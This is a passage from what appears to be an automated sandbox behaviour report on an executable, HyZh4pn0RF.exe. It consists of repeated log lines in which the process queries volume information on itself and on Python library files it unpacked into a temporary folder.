            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Hash VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Hash VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\PublicKey VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\PublicKey VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Util VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\certifi VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\charset_normalizer VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\_bz2.pyd VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\_lzma.pyd VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\win32 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\win32 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\win32 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\pywin32_system32 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\pywin32_system32 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\_wmi.pyd VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\win32 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\pywin32_system32 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\_socket.pyd VolumeInformationJump to behavior
